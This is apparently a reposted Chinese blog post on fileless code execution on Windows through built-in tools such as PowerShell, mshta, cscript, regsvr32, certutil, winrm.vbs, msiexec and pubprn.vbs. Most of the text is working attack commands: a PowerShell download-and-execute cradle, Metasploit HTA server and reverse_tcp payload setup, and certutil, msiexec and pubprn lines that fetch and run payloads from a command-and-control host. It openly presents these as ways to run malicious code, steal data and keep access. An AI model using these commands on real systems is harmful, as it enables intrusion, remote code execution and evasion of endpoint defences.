windows无exe

windows无exewindows无exe加载脚本方式恶意脚本加载powershellmshta.exeCScript.exe&WScript.exeWindows原生工具加载regsvr32.exedllsctcertutil.exewinrm.vbsmsiexec.exewmic.exepubprn.vbs参考加载脚本方式利用Windows自带的解析器:PowerShell、VBScript、批处理文件和JavaScript,对应的应用程序分别为powershell.exe、cscript.exe、cmd.ex

大家好,又见面了,我是你们的朋友全栈君。

加载脚本方式

利用Windows自带的解析器:PowerShell、VBScript、批处理文件和JavaScript,对应的应用程序分别为powershell.exe、cscript.exe、cmd.exe和mshta.exe。利用上传或远程加载对应payload脚本,直接调用解析器运行(可以使用Invoke-Obfuscation或者 Invoke-DOSfuscation 等进行混淆)
用Windows自带的工具或脚本等原生工具实现执行恶意代码、启动程序、执行脚本、窃取数据、横向扩展、维持访问等,常用的有regsvr32.exe、rundll32.exe、certutil.exe、schtasks.exe、wmic.exe等,脚本类型的有:winrm.vbs、wmiexec.vbs、pubprn.vbs等

恶意脚本加载

powershell

powershell "IEX (New-Object Net.WebClient).DownloadString('http://x.x.x.x/Script.ps1'); Script [argv]"

mshta.exe

msf

use exploit/windows/misc/hta_server
set lhost x.x.x.x
set lport 4444
run

windows执行

mshta http://192.168.164.128:8080/lWdH9aFeeIe.hta

在这里插入图片描述

CScript.exe&WScript.exe

上述两个工具都可以解析运行vbs和js的脚本。但值得注意的是WScript是将输出结果以对话框的形式显示,而CScript是以命令行的形式显示输出结果。使用也很简单:cscript %TEMP%\log.vbs 或者 wscript C:\test.js

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.164.128 lport=4444 -f vbs -o 123.vbs
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
run
cscript 123.vbs

Windows原生工具加载

regsvr32.exe

dll

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.164.128 lport=4444 -f dll -o 123.dll
regsvr32 /u /s 123.dll

sct

参考
https://github.com/GreatSCT/GreatSCT

certutil.exe

certuil.exe -urlcache -split -f [URL] outfile.file
certutil.exe -verifyctl -f -split http://www.baidu.com #无法绕过defender

编码

base64 payload.exe > /var/www/html/update.txt

解码执行

certutril -urlcache -split -f http://cc_server/update.txt & certurl -decode update.txt update.exe & update.exe

winrm.vbs

cscript C:\windows\system32\winrm.vbs invoke Create wmicimv2/Win32_Process -SkipCAcheck -SkipCNcheck -file:123.xml

123.xml

<?xml version="1.0" encoding="UTF-8"?>
<p:Create_INPUT xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wmi/root/cimv2/Win32_Process">
   <p:CommandLine>calc.exe</p:CommandLine>
   <p:CurrentDirectory>C:\</p:CurrentDirectory>
</p:Create_INPUT>

在这里插入图片描述
无文件

Winrm invoke Create wmicimv2/Win32_Process @{ 
   CommandLine="calc.exe";CurrentDirectory="C:\"}

在这里插入图片描述

msiexec.exe

C:\Windows\System32\msiexec.exe /q /i http://192.168.164.128:8080/123.msi

复现出错

wmic.exe

# 暂无

pubprn.vbs

C:\Windows\System32\Printing_Admin_Scripts
下语言目录下
可以用来解析sct

pubprn.vbs 127.0.0.1 script:http://x.x.x.x/payload1.sct

参考

https://github.com/GreatSCT/GreatSCT
Windows-noFile

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

发布者:全栈程序员-用户IM,转载请注明出处:https://javaforall.cn/159696.html原文链接:https://javaforall.cn

【正版授权,激活自己账号】: Jetbrains全家桶Ide使用,1年售后保障,每天仅需1毛

【官方授权 正版激活】: 官方授权 正版激活 支持Jetbrains家族下所有IDE 使用个人JB账号...

(0)
blank

相关推荐

  • linux0.11_linux vim安装

    linux0.11_linux vim安装前言所有的UnixLike系统都会内建vi文书编辑器,其他的文书编辑器则不一定会存在。但是目前我们使用比较多的是vim编辑器。vim具有程序编辑的能力,可以主动的以字体颜色辨别语法的

  • 系统调用(int 0x80)详解

    系统调用(int 0x80)详解1、系统调用初始化在系统启动时,会在sched_init(void)函数中调用set_system_gate(0x80,&system_call),设置中断向量号0x80的中断描述符:#defineset_system_gate(n,addr) _set_gate(&idt[n],15,3,addr)其中15表示此中断号对应的是陷阱门,注意,这个中断向量不是中断门描述符

  • compile ffmpeg for armv7 armv7s[通俗易懂]

    1.下载ffmpeggitclonegit://source.ffmpeg.org/ffmpeg.gitffmpeg2.下载gas-preprocessor地址: https://github.com/yuvi/gas-preprocessor下载完后把gas-preprocessor.pl复制到/usr/bin/目录下,修改权限 chmod7773.解压ffm

  • vue 路由嵌套_vuejs直接打开第三级路由

    vue 路由嵌套_vuejs直接打开第三级路由嵌套路由有时候在路由中,主要的部分是相同的,但是下面可能是不同的。比如访问首页,里面有新闻类的/home/news,还有信息类的/home/message。这时候就需要使用到嵌套路由。项目结构如下:

  • lua string find_string.find

    lua string find_string.find在lua的string.find方法用法为string.find(s1,s2)含义为查找字符串s2在s1中出现的位置,如果找不到,返回nil。但这个方法实际上是以正则表达式来解释s2的,所以string.find(‘if(i>10)’,'(‘)这个表达式运行时会出现错误unfinishedcapture。lua中的正则表达式使用的特殊字符为^$()…

    2022年10月14日
  • 机器学习—决策树原理(python代码实现)

    机器学习—决策树原理(python代码实现)首先,决策树(DecisionTree)是一种基本的分类与回归方法,在这里主要讨论用于分类的决策树。决策树的学习通常包含三个步骤:特征选择,决策树的生成,决策树的剪枝。优点:计算复杂度不高,输出结果易于理解,对中间值的缺失值不敏感,可以处理不相关特征数据。 缺点:可能会产生过度匹配的问题。 使用数据类型:数值型和标称型。那么具体的来通过一个例子说明一下决策树。下面这个例子是通过贷款…

发表回复

您的电子邮箱地址不会被公开。

关注全栈程序员社区公众号